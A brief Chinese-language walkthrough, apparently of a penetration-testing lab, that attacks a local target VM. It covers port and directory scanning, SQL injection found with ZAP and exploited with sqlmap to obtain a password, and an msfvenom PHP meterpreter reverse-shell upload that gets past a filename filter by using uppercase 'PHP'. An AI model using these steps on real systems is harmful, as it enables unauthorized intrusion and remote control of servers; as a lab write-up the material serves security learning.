攻擊機:192.168.32.152
靶機 :192.168.32.157
掃描靶機掃端口:

開放了ssh和80
看下ssh版本有沒有漏洞,searchsplot下,沒有發現
dirb掃描下目錄,有個admin的打開

進入到一個登錄界面,隨時試了幾個弱口令,不行

用掃描器吧,打開owasp zap掃一下

直接掃到了一個注入點 http://192.168.32.157/cat.php?id=3 ,直接sqlmap跑一下
存在注入,那么直接,爆庫,爆字段,爆關鍵字,發現了password:

登進來了
找到一個上傳點

再制作一個webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 -f raw
上傳時發現文件名不能包含php,那就改成PHP即可

上傳成功后,再用msf監聽端口,拿到shell
